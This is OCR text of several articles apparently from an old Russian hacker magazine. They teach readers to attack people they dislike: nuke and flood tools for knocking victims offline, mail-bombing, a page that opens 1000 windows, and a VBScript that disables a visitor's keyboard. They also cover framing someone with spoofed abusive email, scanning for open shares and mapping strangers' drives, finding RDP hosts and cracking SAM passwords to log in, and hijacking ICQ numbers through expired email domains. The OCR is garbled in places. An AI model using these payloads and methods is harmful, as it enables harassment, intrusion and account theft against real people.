го вылетает «окно смерти» или «синее окно» в виндах. Чтобы ты не му- 
чался, я расскажу про самые нормальные из них. 


Под рукой все, что может тебе потребоваться 
в продолжении сетевой войны. Узнал ПР, тут 
тебе сервис Whols, с помощью которого 
можно узнать расположение твоего врага с 
точностью до города. Захотел заняться 
мылбомбингом - пожалуйста. 
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NUKE 
IGMP NUKE 
Bec: 219 K6 


Все гениальное - просто! 


Очень простая программа. Вводим ТР-адрес жертвы, количество посылае- 
мых пакетов и размер одного пакета. Ждем, когда жертва упадет в офф- 
лайн. 

При тестировании никаких глюков замечено не было, все прошло нор- 
мально. Но прога вызвала неприятный осадок тем, что иногда жертва не 
падала в оффлайн, а оставалась в онлайне. 


ELITE 
Bec: 280 K6 


Allin One 


А вот эта программа уже намного серьезнее. Прога включает в себя и нюк, 
и флуд, и мылбомбинг (об этом немного позже), и кучу всяких разных 
вкусностей! Скачав эту прогу, можно поудобнее усесться в кресло и начи- 
нать издевательские действия над своими недругами. 


Под рукой все, что может тебе потребоваться в продолжении сетевой вой- 
ны. Узнал ТР, тут тебе сервис Whols, с помощью которого можно узнать 


расположение твоего врага с точностью до города. Захотел заняться мыл- 
бомбингом - пожалуйста. В общем, говорить о программе можно до бес- 
конечности, я просто советую скачать тебе ее и посмотреть собственными 
глазами. 

При тестировании глюков не замечено, жертва падала в оффлайн в 98% слу- 
чаев, но не очень обрадовала (очень не обрадовала ;)) скорость работы. 


WNEWK 
Bec: 98,8 K6 


Абсолютный лидер 


Прога, которая конкретно занимается нюком. Больше добавить нечего ;). 
При тестировании жертва в 99,9% случаев падает в оффлайн, скорость 
просто на высоте, глюки не появляются. 


Думаю, что программ для нюка очень даже достаточно. Если тебе что-то 
не понравится в вышеперечисленных, то у тебя всегда есть возможность 
найти что-нибудь другое, благо нюков по сети валяется премного. Но 
только учти, что иногда бывают такие же заподлянщики, как и ты, которые 
маскируют троян\вирус под такие программки. Так что обязательно про- 
веряй все на наличие вирусов! 

Я не даю тебе ссылки на скачивание, т.к. сам все это дело отрыл у себя на 
винте, но уверен, что тебе не составит труда найти то, что тебя интересует. 


LET’S CONTINUE 


Итак, жертва уже выходит из себя из-за того, что ты постоянно выбрасы- 
ваешь ее из сети. Что же, на этом мы не остановимся, а лишь начнем усу- 
гублять ее положение в Интернете. Следующей стадией вывода подопыт- 
ного из себя будет флуд. Если объяснять на пальцах, то это посылка неме- 
реного количества информации на место дислокации чувака. Т.е. если хо- 
чешь зафлудить ICQ - тебе нужен 1С0-флудер, коих сейчас в огромнейших 
количествах валяется по Интернету. Принцип действия там обычно такой: 
банальное засыпание человека мессагами, вследствие чего у него либо 
забивается весь трафик и он не может ничего сделать, либо его просто 
выкидывает из сети (если он сидит Ha Dial-Up). Если хочешь зафлудить 
мыло, т.е. заняться мылбомбингом (MailBombing), то тебе нужны про- 
граммы Май-Бомберы, которых там же и в таких же количествах валяется. 
Конечно, самый кулхацкерский метод - это открыть\найти\забрать\по- 
просить себе шелл на каком-нибудь серваке и все действия уже произво- 
дить с него. Прикинь, если со своего модема 1000 писем по 1 Кб ты бу- 
дешь отправлять примерно 5-6 минут, то с любого более или менее нор- 
мального шелла все это дело можно сделать за пару секунд ;). Но разго- 
вор на эту тему не вписывается в размер статьи. 


HTML FUCKING 


Следующим шагом может быть, например, отсылка юзверя на «вкуснень- 
кую страничку». Т.е. болтаешь ты с кем-то в чате, и тот у тебя фотку спра- 
шивает (гы, для этого придется завести в чате некую «Машеньку», от име- 
ни которой ты будешь клеить чувака - прим. ред.), а ты его отсылаешь 
на... ;) страничку с таким вот кодом: 


<html> 

<head> 

<title>Hello ][ /-\ |< 01 Z </title> 
</head> 

<script language = javascript> 
function many_windows() { 

var i=1; 

while (i < 1000) { // 

window. open(«about:blank»); 
i++; 

} 

} 


</script> 


ОСТАТЬСЯ В ЖИВЫХ... В СЕТИ 


rundll32 user,exitwindows 
Завершение работы Windows 


rundll32 shell32,SHFormatDrive 
Вызвать окно «Форматирование: Диск3,5(А)» 


rundll32 shell32,SHExitWindowsEx 1 
Закончить Работу с Windows 98 


rundll32 shell32,Control_RunDLL desk.cpl 
Открыть «Свойства Экрана» 


rundll32 krnl386.exe,exitkernel 
Выход из Windows без любых сообщений/вопросов 


rundll32 user,swapmousebutton 
Перепутать клавиши мыши 


rundll32 keyboard,disable 
Отключить клавиатуру 


rundll32 mouse,disable 
Отключить мышь 


rundll32 user,tilechildwindows 
Выстроить все несвернутые окна сверху вниз 


rundll32 user,cascadechildwindows 
Выстроить все несвернутые окна каскадом 


<body onload = «many_windows()»> 

</body> 

</html> 

Думаю, объяснять действие данного скрипта тебе не нужно, сам уже не- 
бось понял (для тех, кто в танке: когда зайдешь на такую страничку, нач- 
нут открываться окна - в нашем случае - тысяча; естественно, когда-то си- 
стемные ресурсы закончатся, и система повиснет). 

Ну аеще прикольнее будет, если юзверь сначала ничего не заметит, а уже 
после перезагрузки он просто-напросто не сможет работать за компом. 
Пишем на страничке следующее: 


<HTML> 

<HEAD> 

</head> 

<body> 

<SCRIPT LANGUAGE=»VBScript»> 

<!— 

Set Shell=CreateObject(«WScript.Shell») 
Shell.Run «rundll32 keyboard, disable « 
</SCRIPT> 

</BODY> 

</HTML> 


После перезагрузки у жертвы отрубится клавиатура. 
Полный список команд смотри во врезке. 


Теперь я расскажу тебе еще более киберпанковский метод того, как нака- 
зать чувака в сети. Для осуществления этого тебе желательно знать... Да 
ничего знать не надо, кроме его мыла! Качаешь себе анонимный мейлер и 
шлешь от его имени гнусные письма САМ СЕБЕ! Затем с этим добром идешь 
на хостинг, где зарегено его мыло, показываешь - так, мол, и так... этот 
<CENSORED> мне тут всякие непристойные предложения шлет да еще и ос- 
корбляет, да какого вы таким уродам досту п даете?! Да я щас на вас в суд 
подам!! Да вы без лицензии останетесь!!. 90%, что его мыло обрубят. (Хо- 
тя вообще-то 50\50 - или отрубят или нет ;)) А если в своих исканиях дой- 
ти до провайдера его... Уууу... 

Итак, надеюсь, ты теперь можешь постоять за себя в сети. Если по- 
явятся какие-то вопросы - пиши, мой мыл открыт. 


как найти общедоступные 


ресурсы в сети 


п АКА DOceNT (docentmobile@mail.ru 


Сейчас я расскажу тебе о технологии, которая изначально 
была придумана для того, чтобы избавить пользователей от 
беготни с дискетами от компьютера к компьютеру с целью 
перенести документ на другой компьютер или распечатать 
его на единственном в офисе принтере. Собственно, без 
этой фишки понятие локальной сети утратило бы свой 
Смысл. 


Как ты понимаешь, речь идет об общедоступных сетевых ресурсах, то есть 
винчестерах и принтерах, доступ к которым открывают обычно в любой 
локальной сети для совместной работы с этими устройствами. Удобно, ко- 
нечно же, просто отправить на печать документ со своего компьютера на 
принтер, стоящий в соседней комнате, или обменяться файлами с соседом 
по сети. Беда в том, что некоторые пользователи даже не задумываются, 
какой опасности подвергают свою информацию, открывая полный доступ 
к своему винчестеру, вместо того чтобы просто создать общую папку спе- 
циально для обмена, открыть доступ только для чтения или хотя бы запа- 
ролить ресурс. Ведь кроме соседа, к хранящейся на нем информации мо- 
гут точно так же получить доступ и посторонние. Это не проблема для не- 
большой сети, не имеющей какого-либо выхода в Инет, но такое бывает 
редко. А уж если ты подключен по выделенке или, как сейчас модно, к 
провайдеру, тянущему по району витую пару и подключающему по ней 
весь этот район к толстому каналу, тогда вообще берегись. Мало того, что 
ты не знаешь всех пользователей этой сети, так еще и комп твой постоян- 
но оказывается доступным хоть из Австралии (разумеется, пока он вклю- 
чен в сеть... электрическую :)). Каким образом? А очень просто - с помо- 
щью сканера расшаренных ресурсов. И таких любителей, охочих до чу- 
жой информации, по сети бродит очень много. Вторжение их на твой 
комп чем-то похоже на вторжение в твой дом, и так же неприятно, а то и 
опасно, мало ли чего там у тебя на винте - может пароли для запуска ядер- 
ной ракеты :). Зачем это нужно, я думаю, пояснять не надо: кто-то ищет 
банальные пароли от Инета или от Аськи, кто-то - просто какую-нибудь 
полезную для них информацию или софт, а есть и просто деструктивные 
придурки, которые, обнаружив расшаренный диск, удаляют с него все 
подчистую (при наличии полного доступа на него) или распечатывают ка- 
кую-нибудь фигню на принтере. Помимо указанных опасностей в виде 
потери данных и проникновения в личную жизнь, тут наблюдаются и ма- 
териальные убытки. Я не беру случаи, когда на винте лежит какая-нибудь 
важная коммерческая инфа, утрата или доступ к которой грозит серьез- 
ными неприятностями. А хотя бы самое простое: ты подключен по выде- 
ленке, твой комп почти все время включен и находится в сети, некто под- 
ключился к твоему винту из Инета и скачал у тебя забавы ради какой-ни- 
будь фильм или дистрибутив программы (ну халявный у него Инет, или 
богатый он сильно). Я думаю, с провайдером ты еще долго будешь распла- 
чиваться за многогигабайтный трафик, если, конечно, сам не ездишь на 
новом «Лэндклузере» и твой карман не оттягивает пачка свеженьких сто- 
долларовых купюр (хотя и в этом случае было бы очень обидно). 

В общем, пришло время освоить, как это делается, как грамотно от этого 
уберечься и в случае чего, наказать обидчика. 


НАЧАЛЬНАЯ ВОЕННАЯ ПОДГОТОВКА 


Прежде всего, нужно настроить свой компьютер для работы по протоколу 
NetBEUI - именно он используется для доступа на общие ресурсы. Если 
твой компьютер в сети, то, возможно, этот протокол и так включен. В лю- 
бом случае разберемся. Открой свойства подключения, для которого ты 
хочешь включить протокол. Для Windows 2000/ХР эти настройки находят- 
ся во вкладке «сеть» окна свойств подключения - посмотри, есть ли там 
следующие пункты (если есть, то помечены ли они галочками): «NWLink 
IPX/SPX/NetBIOS - совместимый транспортный протокол», «NWLink 
NetBIOS», «Служба доступа к файлам и принтерам сетей Microsoft» и 
«Клиент для сетей Microsoft». Если нет, нажми «Установить» и установи, 
соответственно, клиент, службу и протокол. Убедись, что все они помече- 
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Свойства соединения в ХР 


ны галочками. Протокол TCP/IP также должен быть установлен и помечен 
галочкой, но его любая версия Windows и так ставит и включает по умол- 
чанию, так что если ты его сам не удалил, то он там должен быть (его на- 
стройки и IP-agpeca, если они требуются в твоей сети, также обязательно 
должны быть правильно установлены). Нажми «Применить». После этого 
может потребоваться перезагрузка. Собственно, теперь твой комп готов к 
работе с общедоступными ресурсами (также ты теперь можешь открывать 
свои собственные ресурсы, но об этом поговорим потом). 
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Свойства соединения в Win98 


Если у тебя Windows 9x, то все делается примерно так же. Там тебе надо 
поставить протокол NetBEUI, службу доступа к файлам и принтерам и 
клиента для сетей Microsoft. 


Теперь нужно выбрать сканер. Я предпочитаю и рекомендую Legion. Его 
название оправдывает себя, сканер действительно достаточно мощный, и 
глюков в нем немного. Найти этот и другие сканеры можно хоть на 
www.altavista.com, хоть на astalavista.box.sk (очень полезный ресурс не 
только в плане кряков к прогам, но и софта там можно найти немало). По- 
сле установки никакой особой настройки ему не требуется. 


СКАНИРУЕМ 


(Сканировать можно любую сеть - как локалку, так и любую сеть через 
Инет, причем неважно, через какое соединение, подойдет и диал-ап, хотя 
скорость оставит желать лучшего (особенно если сканируешь таких же 
диалапщиков). Единственное, что нужно указать в настройках Legion, это 
скорость твоего соединения. Если у тебя модем, то в поле Connection 
Speed ставь скорость, с которой твое соединение работает, то есть Slower 
(меньше, чем 28.800), 28, 56. Ну а если у тебя сеть или выделенка, ставь, 
соответственно, Faster. Далее ставь в none Scan Туре опцию Scan Range, 


ИЩЕМ ШАРЫ 


что позволит сканировать тебе диапазон адресов. Теперь определимся с 
]Р-адресами. 

Если ты в сети, то, скорее всего, должен знать, какие ТР-адреса в ней ис- 
пользуются, и, соответственно, в поле Scan Range задавай Start ТР тот адрес, 
с которого начнешь сканирование; для полноты поиска задавай что-то ти- 
па ххх.ххх.0.1 и End IP, тот, которым закончишь, типа ххх.ххх.255.255. Но я 
тебе привел пример очень большого диапазона адресов; если у тебя мед- 
ленное соединение, то сканирование может занять много времени. Поэто- 
му сканируй лучше понемногу. Учти, что программа может сканировать 
только сети класса С, то есть ты можешь ввести стартовый и конечный ад- 
реса с одинаковыми первыми двумя цифрами. Так что если твоя сетка боль- 
шая, сканируй ее в несколько проходов по сегментам. Если ты не знаешь, 
какой диапазон сканировать, посмотри свой ТР и делай выводы. Например, 
если твой IP 192.164.0.33, то можешь просканировать весь свой сегмент от 
192.164.0.1 до 192.164.255.255. В локальных сетях, в особенности в тех, 
которые тянет по району провайдер и подключает через себя к Инету, мож- 
но найти огромное количество компьютеров с открытыми ресурсами. Мно- 
гие пользователи таких сетей даже специально открывают диски для кого- 
нибудь из своих знакомых, а то и для всех желающих, чтобы обмениваться 
с ними различными файлами. Но они, как правило, осторожны, открывают 
только одну папку для обмена, а не весь диск. Некоторые даже и ее запа- 
роливают. В таких сетях можно найти много вкусностей, к тому же часто и 
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совершенно честным путем, например, фильмы в MPEG4, МР3З-файлы, дис- 
трибутивы полезного софта, короче, если ты подключен к такому провайде- 
ру через районную сеть, то на рынок за дисками можно не ходить, осталось 
только поискать такие ресурсы сканером. Трафик внутри одной сети у мно- 
гих таких провайдеров либо очень дешевый, либо вообще бесплатный. Так 
что своих соседей по сети, пусть даже и незнакомых, лучше не обижать и не 
воровать - с ними лучше дружить. 

Что касается сканирования диалапщиков, сидящих, например, у того же 
провайдера, что и ты, то тут 1Р-адреса можно узнать следующими спосо- 
бами. Иногда сам провайдер задает какой-то диапазон адресов, любой из 
которых назначается и тебе при каждом дозвоне (динамический ТР), ес- 
ли он, конечно, не назначает всем статических ТР (те, которые не меняют- 
ся при каждом дозвоне). Обычно первые две цифры не меняются, а вот 
последние две могут постоянно меняться для каждого из пользователей. 
Но тут уже достаточно знать хотя бы первые две. Например, 
195.120.ххх.ххх. Можешь сканировать весь этот сегмент. Практика пока- 
зывает, что в очень редких случаях ты не найдешь ни одного компа с от- 
крытыми дисками и принтерами. Причем очень часто открыты как мини- 
мум на чтение даже системные диски, я думаю, ты уже понял, что можно 
на них найти и скачать :). Видимо, либо пользователи такие неосторож- 
ные, либо просто у них там сеть, и расшаренные диски - необходимость. 
Так же ты можешь посканировать и любую другую сеть, только вот особо 
крупного ничего не перекачаешь, если, конечно, у тебя не анлим со ста- 
бильным соединением. Если тебе нужно проверить, нет ли открытых дис- 
ков у какого-то конкретного человека, то достаточно узнать его ТР и за- 
дать ero Legion’y и как начальный, и как конечный адрес. 
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После того как процесс сканирования закончен, в левом поле ты увидишь 
(или не увидишь - как повезет) все компы, на которых есть какие-либо об- 
щедоступные ресурсы и их ТР. Теперь можешь кликать по ним и смотреть, 
что там наловилось. Чтобы присоединить расшаренный диск и посмотреть 
его содержимое, нажми кнопку Map drive, и он будет подключен к твоему 
компу стандартным образом, пока ты сам его не отключишь. Диск может 
быть и запаролен - тогда облом, пользователь оказался не ламер. 


ЧТОБЫ САМОМУ НЕ НАРВАТЬСЯ 


Пришло время поговорить и о защите от посягательств любителей сетевого 
беспредела. Самое основное правило - без необходимости лучше вообще 
не расшаривать свой диск или принтер; если же это требуется, то хотя бы 
запароливай его, а лучше выделяй одну-две общих папки (можно и с пол- 
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ным доступом), не оставляя в них залитую тебе важную инфу надолго. То, 
что в них залили, проверь антивирусом. И главное, никогда не расшаривай 
системный диск - это откроет доступ к твоим паролям. Если у тебя несколь- 
ко соединений, не задавай указанные выше протоколы для всех сразу - на- 
фига тебе шаринг дисков на диал-апе? 

Также очень рекомендую поставить Firewall (смотри предыдущий номер - 
он весь был посвящен этой теме). С ним ты сможешь просто открыть до- 
ступ к твоим общим ресурсам только для известных тебе ТР-адресов и 
блокировать подключения со всех посторонних ТР. Наконец, с помощью 
него ты, в случае чего, можешь вычислить непрошеного негодяя по ТР, ос- 
тавленным им в логах, и наказать его по заслугам. 

Вот, собственно, и все основные премудрости защиты. 


ОТМАЗКА 


Вся эта инфа была приведена исключительно для ознакомления, и чтобы 
ты мог использовать это только для защиты от таких вторжений. Конечно 
же, сканировать сеть и, тем более, залезать на чужие компы без спросу - 
это очень неэтично. Кроме того, это может расцениваться как вторжение 
в личную жизнь. Я уже не говорю о том, если ты спер и использовал па- 
роль, стер что-то (или вообще все) с чужого винта. Если тебя вычислят и 
поймают (я уже, кажется, упоминал страшные слова «Firewall» и «логи») - 
за такие дела тебя может постигнуть суровая кара в виде банального мор- 
добоя, наручников и неба в клеточку (кстати, почти все провы в своих 
рулсах грозятся всякими неприятностями за сканирование пользовате- 
лей), а то и пули между глаз - мало ли до кого ты так досканируешься. И 
потом не жалуйся, что тебя не предупредили, я с себя ответственность за 
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удаленный помощник WinXP 
DemiurG (arkhangel@mail.ru) 


ПРАВД МНОГО, А ИСТИНА ОДНА 

Идея удаленно администрировать компьютер, пользоваться его ресурсами 
пришла создателям программного обеспечения очень давно. Еще на заре 
цивилизаций корпорация Sun предложила создать «тонкие клиенты». Каж- 
дый «тонкий клиент» представлял собой бездисковую рабочую станцию 
т.е. вся информация (в том числе и операционная система самого компа) 
загружалась со специального крутого терминального сервера и вся работа 
происходила по сути не на локальной машине, а на сервере. Идея была хо- 
рошая, но ее реализация обошлась слишком дорого. И про нее забыли... 
Но ненадолго. После выхода на рынок операционной системы Windows NT 
Workstation 3.51 никому не известная компания Citrix (www.citrix.com) вы- 
пускает на рынок программный продукт под названием WinFrame, который 
позволяет удаленно получать доступ к любому Windows приложению. Но 
это было только начало... Революцию же произвело появление нового 
продукта Citrix - Metaframe (сейчас он переименован в Metaframe ХР). Уста- 
навливая клиента на локальной машине, юзер, подключаясь к серверу 
Metaframe, no сути просто работал на нем, используя ресурсы сервака, а не 
своей локальной машины. Клиент Citrix поддерживал практически все ис- 
пользуемые системы (от DOS’a до никсов). Microsoft же не смогла смирить- 
ся с такой активной деятельностью и... просто купила лицензию Citrix для 
использования в своих OC ее технологий. Первый шаг (не слишком удач- 
ный) - выпуск Windows МТ Terminal Server Edition не получил должного рас- 
пространения. Поэтому в Windows 2000 Server (равно как и в последующих 
версиях серверной линейки Microsoft) терминальные сервисы банально 
выбирались при установке, но требовали специальную лицензию, без кото- 
рой работали только 90 дней. 


ИБО БЛАГИМИ НАМЕРЕНИЯМИ ПУТЬ В АД УСЕЯН 


Как известно, Windows XP не является серверной системой. Это чисто кли- 
ентская ОС, заточенная под стабильную работу в сети. Причем же тут эти 
злобные терминальные сервисы? Ответ прост - если верить Microsoft’y, то 
Windows ХР является апогеем развития линейки Windows (а в частности 
Windows МТ), при этом линейка Windows 95 (98, МЕ) банально умирает. 
Раньше мелкомягкие позиционировали на рынке Windows МТ (w2k) для ра- 
боты в сети, а линейку Windows 95 для домашней работы. Теперь же альтер- 
нативы у юзеров не должно быть (по мнению MS - мы-то с тобой знаем аль- 
тернативу!) - только WinXP, но возникает ряд проблем: толпы пользовате- 
лей, всю свою долгую жизнь проработавших в любимой оси, могут просто 


Под UNIX системы тоже существуют «уда- 
ленные помощники» (например, УМС или 
тот же Metaframe). Но в этих случаях они 
более ориентированы на безопасность и 
функциональность, а не на легкость и про- 
стоту использования. 
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Привет, Кулхацкер! Как жизнь? Что - лучше всех? Не может 
ЫТЬ... А под какой операционкой ты сейчас сидишь? Да-да, 
самой крутой, самой навороченой, самой микросовтовской - 
Windows XP. А ты в курсе, мой маленький пушистый друг, что 
Микрософт в каждую операционку включила троян, который 
позволяет любому человеку удаленно администрировать твой 
комп, т.е. получать к нему полный доступ - расшаривать 
винты, удалять файлы, читать твою переписку с Машей. Что, 
поплохело? Думаешь, я пошутил? Тогда давай разбираться! 


рис. Борис Алексеев 


не освоиться в ХР - заблудиться, потеряться а еще хуже всего поставить 
Linux или FreeBSD - вот будет кошмар! Именно поэтому МС в свое послед- 
нее творение встроило Удаленного Помощника (Remote Assistance) - далее 
по тексту КА. Цитирую официальную документацию МС: «Пользователи 
(особенно не обладающие достаточным опытом) часто сталкиваются при 
настройке своих компьютеров или выполнении тех или иных задач с про- 
блемами, которые не удается решить, общаясь по телефону с техническим 
специалистом либо просто с другом или членом семьи. Возможность обра- 
щения к удаленному помощнику (Remote Assistance) предоставляет в рас- 
поряжение пользователей способ получения необходимой им помощи, а 
также упрощает и удешевляет работу корпоративных служб технической 
поддержки. Кроме того, данная возможность позволяет опытным пользова- 
телям оказывать непосредственную помощь своим знакомым и членам се- 
мьи». Банальный пример: наивная девочка Маша не может установить 
драйвер для принтера, естественно - она просит тебя помочь выполнить эту 
операцию, ты соглашаешься, подключаешься с помощью клиента к ее ком- 
пу (подключившись, ты видишь полностью Рабочий стол Маши, тем самым 
ее комп находится полностью в твоей власти) - выполняешь эту сверхслож- 
ную операцию - и все... Маша - твоя... 


ЗАВЕТНОЕ ЧИСЛО 3389 


Это, конечно, все замечательно, но давай все же разберемся, каким образом 
ты подключаешься к Маше, что для этого надо и как эту возможность ис- 
пользовать в своих извращенных целях. Давай немного подготовимся: 1) 
проверь Панель Управления - Администрирование - Службы, Службы Терми- 
налов должны быть запущены, 2) Панель Управления - Система - Удаленное 
Использование, обе галочки должны быть активными. Что же представляет 
собой КА? RA - это банальный сервис, который висит на 3389 порту. Каким 
образом я это узнал - давай проверим вместе. Для начала качнем с сайта 
www.rsh.kiev.ua Shadow Security Scanner (далее по тексту - SSS). Для тех, 
кто в танке, - SSS является одним из самых лучших (ИМХО) сканером на ре- 
сурсы и открытые порты (не буду вдаваться в подробности, ибо описание 
возможностей SSS выходит за рамки данной статьи). И просто попытаемся 
просканить самих себя. Вот примерно что мы увидим: 


Сразу видим, что на порту 3389 кто-то сидит - это и есть тот самый КА, в ко- 
нечном итоге он является «Службой терминалов», которую мы запустили 
еще в самом начале. Логично предположить: раз он висит на этом порту - 


значит кого-то ждет (т.е. если есть сервер - значит должен быть клиент). 
Где же он? Клиент КА называется Remote Desktop (типа Удаленный Рабо- 
чий Стол), далее по тексту - RD, и поставляется вместе с дистрибутивом 
Windows ХР. Находится он в папке Support Tools (msrdpcli.exe). Если же ты 
приобрел обрубленную пиратскую версию (в чем я не сомневаюсь), то 
подь сюды -  http://download.microsoft.com/download/whistler/ 
tools/1.0/wxp/en-us/msrdpcli.exe. RD устанавливается под все известные 
винды (95, 98, me, NT, w2k, хр) и прописывается в Пуск - Программы - Стан- 
дартные - Связь - Подключение к удаленному рабочему столу. У Маши есть 
масса способов попросить тебя о помощи: она может это сделать с помо- 
uybto Windows Messenger или банально с помощью почты... останавливать- 
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ся на этом не хотелось бы, эти моменты отлично освещены на сайте МС 
(www.microsoft.com/rus/windowsxp/techinfo/deployment/default.asp). 
Другой вопрос - применение Помощника в кулхацкерских задачах и вы- 
полнение с помощью его кулхацкерских идей. Будем объективны. КА пред- 
ставляет собой полнофункциональное средство удаленного администри- 
рования компьютера. Не будь в нем функции информирования пользова- 
теля о подключении - данный программный продукт был бы записан в од- 
ну категорию наравне с ВО, SubSeven и т.д. Для того чтобы подключиться 
к чужому компу, надо знать имя и пароль юзера (в WinXp есть возможность 


ХР-АДМИНИСТРАЦИЯ 


создания юзера с пустым паролем, но такие юзеры не имеют права под- 
ключаться удаленно). Если же ты пытаешься войти в систему с помощью 
ВО, юзеру, работающему локально на машине, будет предложено выпол- 
нить Log Off, и только после этого ты сможешь войти. Но есть маза: если 
герла отошла кофейку попить и как раз в этом момент ты подключаешься, 
то система, даже не найдя подтверждения, все равно пустит тебя, выбро- 
сив предварительно Машу. 


ИЩЕТСЯ ЛОХ. ОДНА ШТУКА 


Давай попытаемся взломать кого-нибудь с помощью возможностей УП. OT- 
крываем SSS и указываем проверять только порт 3389. 

Выбираем диапазон ТР-адресов (это твое личное дело, как его достать) и 
далее просто ждем... Рано или поздно мы найдем того самого лоха, теперь 
цель - надо узнать его пароль или пароль аккаунта Администратор (он мо- 
жет быть переименован, так что 20 раз подумай). Как ты это сделаешь - те- 
бе решать, об этом была написано масса инфы в твоем любимом журнале 
(я, разумеется, имею в виду нас :)). В данном примере мне просто повезло. 
Небольшой оффтопик: если сумеешь вытащить ero SAM базу - то ломать ее 
надо с помощью LOpht Crack 3.0 (старые версии будут корчиться в судоро- 
гах, но так ничего и не найдут). Допустим, ты нашел пароль, что же теперь? 
Запускай RD - вводи его данные и все! 


Только давай договоримся, мы с тобой не вандалы, а специалисты по ин- 
формационной безопасности (это звучит гордо), и поэтому никаких форма- 
тирований, гадостей, ты же не хочешь дурными поступками себе карму ис- 
портить? Вот так-то... 


Теперь у тебя есть жертва 


РЕЗЮМЕ 


Windows ХР рулит. Несомненно. Но я не считаю, что КА является брешью в 
твоей системе. Можно, конечно, катить на МС и считать КА трояном в систе- 
ме, но на самом деле это же не так. Наоборот, мелкомягкие сделали все 
возможное, чтобы их фича не превратилась в мощное оружие. И то, что мы 
взломали систему, говорит о низкой квалификации пользователя (который 
не знает, какие порты и сервисы работают в системе), а вовсе не о дегра- 
дации программеров Microsoft. Удачи тебе, Кулхацкер, познавай новые си- 
стемы, открывай новые миры... если что, пиши - arkhangel@mail.ru. 
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Я думаю, не надо пояснять, зачем нужно угонять Асю. 
Последнее время это становится тем более актуальным, так 


| С как сейчас количество знаков в номере Аськи перевалило за 
a 10. Так что если ты по-честному зарегистрируешься, то 


ПРОЕСТОЦ 
B3SInom 


угоняем красивые номера 


ROm@n АКА DOceNT (docentmobile@mail.ru) 


получишь неудобоваримое множество циферок, которое и 
тебе, и твоим друзьям запоминать будет очень неудобно. Да 
и не круто хакеру с длинным номером сидеть (если ты, 
конечно, не конспирируешься). Самые престижные номера, 
как известно, состоят из 6 цифр. На черном сетевом рынке 
цены на них, в зависимости от последовательности цифр, 
исчисляются десятками, а то и сотнями долларов. Чем более 
он старый, начинающийся, например, с единицы, двойки и 
т.д. тем он круче. 


рис. Борис Алексеев 


Далее идут семизначные, менее престижные, зато более дешевые. С недав- 
них пор в разряд часто угоняемых попали и восьмизначные номера. Если хо- 
чешь узнать, сколько такие асечные пираты берут денег за номера, введи в 
поисковой системе что-нибудь вроде «короткие номера ICQ» и наверняка 
увидишь немало ссылок на сайты, где ими торгуют. Я вовсе не призываю те- 
бя зарабатывать таким угоном деньги, а даже наоборот - крайне не рекомен- 
дую этого делать. Хотя это и не считается таким уж серьезным электронным 
преступлением, все же несколько человек за историю существования систе- 
мы ICQ понесли уголовную ответственность (вроде бы не в России) за угон 
и торговлю номерами. Так что можешь угнать парочку номеров для себя, но 
не наглей. И сразу оговорюсь - не пытайся угнать какой-нибудь сильно кру- 
той номер, вроде тех, где все шесть цифр - одинаковые, или самый первый, 
так как они все уже давно угнаны (позже объясню, почему не получится уг- 
нать) и, что примечательно, зарегистрированы на жителей России (есть по- 
вод гордиться!), Украины и других стран бывшего CCCP, а также Израиля и 
Китая. Это при том, что в этих странах (кроме Израиля) Ася стала распрост- 
раняться намного позже, чем оказались законно занятыми все шестизнач- 
ные номера. Есть над чем задуматься :). 


УГНАТЬ ЗА 60 СЕКУНД 


Угон асечных номеров по своей сути не является взломом, это скорее ловля 
на дурака. Все основано на том, что Ася может высылать по запросу «забы- 
тый» пароль пользователю на тот ящик, который он указал при регистрации. 
Причем, если даже потом изменить этот адрес, то пароль все равно будет от- 
сылаться только на тот, который был указан сначала, даже если его уже не 
существует. Вот именно этим нам и остается воспользоваться. То есть найти 
такие короткие номера, в которых указан почтовый адрес, которого не суще- 
ствует. Или же получить доступ к существующему мыльнику и спереть вы- 
сланный на него пароль. Легче всего это сделать, если мыльник халявный, 
вроде mail.com. В таких почтовых системах тоже есть напоминалки паролей, 
но это тема отдельной статьи. 

Некоторые пользователи вообще вводят в качестве почтового адреса какой- 
нибудь левый, заведомо не существующий адрес с несуществующим доме- 
ном. Например: qwerty@qwerty.com, считая, что это оригинально, остроум- 
но и никто никогда такой адрес не сделает (наивные). 

Если домен существует, но адреса такого нет, тогда ничего не стоит зарегис- 
трировать на том же домене такой ящик. Например, если это 
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lamer@mail.com, идем, соответственно, на WWW. mail.com, проверяем, сущест- 
вует ли такой адрес, и если нет (ведь такие бесплатные почтовые системы пе- 
риодически стирают неактивные адреса), то просто создаем его и заставля- 
ем ICQ «напомнить» нам пароль oT Аси, в которой этот мыльник указан. Па- 
роль придет в течение суток. Хотя, если этот адрес указан уже позже, а при 
регистрации был указан другой, то пароль, скорее всего, не придет. Но попы- 
таться стоит. Если адрес был указан на домене какой- 
нибудь конторы, которая выделяет адреса только для 
сотрудников, тогда тоже облом. Можно, конечно, еще 
попытаться достать пароль и от мыльника. 

Если же не существует домен, как в случае с qwer- 
ty@qwerty.com, тогда нужно зарегистрировать домен 
www.qwerty.com и создать на нем же ящик с именем 
qwerty@quwerty.com, а далее «напомнить» пароль на 
него. Тут ты, конечно же, скажешь: что, мол, мне так для 
каждого адреса домен регистрировать? Да за него ж 
еще и платить надо! Ну уж нет, братан, тут ты будешь не 
прав. Сходи-ка, например, Ha www.doteasy.com - эта 
система предлагает любому желающему создать домен 
второго уровня совершенно на халяву, с учетом только 
того, что тебе нужно будет регулярно обновлять содер- 
жимое сайта и что на сайте будет хоть какая-нибудь 
регулярная посещаемость (маленькая ложка дегтя: за 
домен надо платить 35 баксов, но деньги берутся не 
сразу - если за месяц привести двух рефералов, то ла- 
вэ твои останутся в целости и сохранности; браться за 
такой хак надо, только если имеется хотя бы один ва- 
лидный номер кредитки, а наличие на ней денег не 
обязательно - прим. ред.). Но нам-то в данном случае 
нужен не сайт, а всего лишь ящик, да и то на время. Так 
что заводи там нужный тебе для угона домен, регистра- 
ция его может занять от нескольких дней до недели, 
прежде чем ты сможешь разместить ящик. Можно по- 
искать и другие похожие системы, если в этой тебя что- 
то не устроит (может они уже изменили условия, пока 
готовился этот номер). Кое-что о них можно найти тут 
- http://sazmoney.narod.ru/ web/domain.htm - или 
введя запрос в поисковом сервере вроде «бесплатные 
домены». Есть системы, которые позволяют создать 
только мыльник, в котором и имя, и домен будет таким, 
как ты захочешь. Нужно только поискать. 


ЛОЖКА МЕДА В БОЧКЕ ДЕГТЯ 


Поиск такого короткого номера, да еще и чтобы был 
подходящий мыльник, которого либо не существует, 
либо к которому можно как-то получить доступ, - про- 
цесс очень длительный и жрущий много часов по диал- 
